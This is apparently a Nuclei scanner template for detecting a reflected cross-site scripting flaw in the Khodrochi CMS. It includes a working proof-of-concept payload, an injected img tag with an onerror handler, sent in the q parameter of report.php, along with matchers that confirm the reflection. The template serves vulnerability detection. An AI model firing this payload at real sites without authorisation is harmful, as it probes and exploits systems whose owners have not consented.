id: khodrochi-cms-xss info: name: Khodrochi CMS - Cross Site Scripting author: r3Y3r53 severity: medium description: | A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform. reference: - https://www.exploitalert.com/view-details.html?id=38723 - https://cxsecurity.com/ascii/WLB-2022050087 metadata: verified: true max-request: 1 tags: khodrochi,cms,xss http: - method: GET path: - "{{BaseURL}}/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - 'contains(body, "class=\"cons_form") && contains(body, "><img src=x onerror=prompt(document.domain)>")' condition: and # digest: 490a004630440220121afca0421cca463af791b4154dc5eeed6ce29890024ee34971701da5940ab002200b9cfeb79edc16f92026849bc8ce918f28530ee2f22aaf15621438af6ed6158b:922c64590222798bb761d5b6d8e72950